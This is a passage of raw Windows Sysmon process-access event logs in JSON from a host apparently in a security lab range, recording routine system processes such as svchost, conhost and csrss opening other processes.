06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6796,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-12B4-5F25-0000-00100B7B0900}\r\nSourceProcessId: 4788\r\nSourceThreadId: 3988\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-0010497A0900}\r\nTargetProcessId: 4972\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-12B4-5F25-0000-00100B7B0900}","SourceProcessId":"4788","SourceThreadId":"3988","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-0010497A0900}","TargetProcessId":"4972","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6797,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.928\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1236\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-0010E47C0900}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\system32\\speech_onecore\\common\\SpeechModelDownload.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\UBPM.dll+ac60|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+389a|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.928","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"1236","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-0010E47C0900}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\system32\\speech_onecore\\common\\SpeechModelDownload.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\UBPM.dll+ac60|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+389a|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6798,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.928\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-0010E47C0900}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\system32\\speech_onecore\\common\\SpeechModelDownload.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.928","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-0010E47C0900}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\system32\\speech_onecore\\common\\SpeechModelDownload.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6799,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.928\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.928","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6800,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.928\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.928","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6801,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.928\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.928","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6802,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.928\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.928","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6803,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.928\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.928","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6804,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.928\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: 